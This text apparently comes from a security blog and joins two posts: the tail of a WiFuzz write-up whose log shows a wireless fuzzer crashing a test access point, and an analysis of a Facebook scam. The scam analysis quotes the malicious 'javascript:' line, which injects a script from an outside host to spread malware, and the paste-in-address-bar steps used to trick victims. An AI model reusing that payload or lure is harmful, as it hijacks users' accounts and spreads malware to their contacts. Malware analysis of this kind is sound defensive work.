Wed Sep 28 10:38:36 2011 {WIFI} Beacon from SSID=[TestMe] found (MAC=[00:aa:bb:cc:dd:ee])
Wed Sep 28 10:38:36 2011 {WIFI} Starting fuzz 'auth'
Wed Sep 28 10:38:36 2011 {WIFI} [R00001] Sending packets 1-100
Wed Sep 28 10:38:50 2011 {WIFI} [R00001] Checking if the AP is still up...
Wed Sep 28 10:38:50 2011 {WIFI} Waiting for a beacon from SSID=[TestMe]
Wed Sep 28 10:38:50 2011 {WIFI} Beacon from SSID=[TestMe] found (MAC=[00:aa:bb:cc:dd:ee])
Wed Sep 28 10:38:50 2011 {WIFI} [R00002] Sending packets 101-200
Wed Sep 28 10:39:04 2011 {WIFI} [R00002] Checking if the AP is still up...
Wed Sep 28 10:39:04 2011 {WIFI} Waiting for a beacon from SSID=[TestMe]
Wed Sep 28 10:39:04 2011 {WIFI} Beacon from SSID=[TestMe] found (MAC=[00:aa:bb:cc:dd:ee])
Wed Sep 28 10:39:04 2011 {WIFI} [R00003] Sending packets 201-300
Wed Sep 28 10:39:18 2011 {WIFI} [R00003] Checking if the AP is still up...
Wed Sep 28 10:39:18 2011 {WIFI} Waiting for a beacon from SSID=[TestMe]
Wed Sep 28 10:39:19 2011 {WIFI} Beacon from SSID=[TestMe] found (MAC=[00:aa:bb:cc:dd:ee])
Wed Sep 28 10:39:19 2011 {WIFI} [R00004] Sending packets 301-400
Wed Sep 28 10:39:42 2011 {WIFI} [R00004] recv() timeout exceeded! (packet #325)
Wed Sep 28 10:39:42 2011 {WIFI} [R00004] Checking if the AP is still up...
Wed Sep 28 10:39:42 2011 {WIFI} Waiting for a beacon from SSID=[TestMe]
Wed Sep 28 10:40:42 2011 {WIFI} [!] The AP does not respond anymore. Latest test-case has been written to '/dev/shm/wifuzz-eK97nb.pcap'

The AP has been tested using the "auth" module (802.11 Authentication Request fuzzer). In this case, the AP has crashed after roughly 325 packets, and a PCAP file with all the generated packets since the beginning of the last fuzz round has been written to "/dev/shm/wifuzz-eK97nb.pcap".

Conclusions
We use WiFuzz in our daily activities, and it lead to the identification of some interesting wireless bugs. The tool is available here, and it is released under the GPL license. so feel free to contribute!

Facebook malware on the rise

3 comments
Today, many Italian users found on their Facebook profiles some links similar to the one depicted below. For non-Italian speakers, the text can be translated as "Facebook security check. To see the video, follow these steps".


When the "Continue" button is pressed, the following form is displayed:


Here is the translation:
  1. Select the address bar
  2. Press 'j' on the keyboard
  3. Press (CTRL+V) and press ENTER
What happens under the hood is quite simple, and similar to other Facebook malware. The link posted on the victim's Facebook profile refers to a malicious SWF file (hxxp://www.cowboysaliensstreaming.com/tag/test.swf) which displays the two dialogs depicted above. Once executed, the applet also fills the clipboard with the text:

avascript:(a=(b=document).createElement(\'script\')).src=\'hxxp://www.cowboysaliensstreaming.com/tag/fb.php\',b.body.appendChild(a);void(0)

Then, the SWF asks the user to click on the address bar, press 'j' and then CTRL+V. The result is that the following text is copied in the address bar:

javascript:(a=(b=document).createElement(\'script\')).src=\'hxxp://www.cowboysaliensstreaming.com/tag/fb.php\',b.body.appendChild(a);void(0)

As a consequence, a piece of Javascript code is executed that can interact with the Facebook DOM document. The Javascript code fragment creates a new HTML <script> element which loads the resource stored at hxxp://www.cowboysaliensstreaming.com/tag/fb.php. The malicious resource spreads the malware to the Facebook friends of the victim, and eventually displays some spam links:


For those who are interested, a copy of the malicious Javascript code can be found here.

So nothing is really new with this sample: the same techniques have already been used several times in the past. What is astonishing is the number of victims: despite Internet users should be now familiar with these trivial threats, there have been more and more (mostly Italian) Facebook users who carefully followed the instructions of the malware, without even thinking about why they should ever copy a strange string in the address bar to see a YouTube video.